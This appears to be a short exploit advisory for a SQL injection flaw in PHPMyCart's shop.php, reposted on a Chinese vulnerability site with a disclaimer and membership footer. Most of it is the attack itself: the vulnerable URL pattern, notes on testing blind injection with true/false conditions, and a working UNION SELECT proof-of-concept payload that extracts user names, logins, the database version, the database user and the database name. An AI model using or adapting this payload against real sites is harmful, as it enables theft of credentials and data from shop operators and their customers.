###################### # #PHPMyCart Injection Vulnerability # ###################### # #Bug by: h0yt3r # ## ### ## # #Script suffers from a not correctly verified category id variable which is used in SQL Querys. #An Attacker can easily get sensitive information from the database by #injecting unexpected SQL Querys. # #We dont get any SQL Errors when the Injection Query appear to be false. #However we have to look for content changing when we inject. #Look at AND 1=1/AND 1=0 #All rows are echoed on the left side. # #SQL Injection: #http://[target]/[path]/shop.php?cat=[SQL] # #PoC: #shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user # ####################### # #Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team! # ####################### #######################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论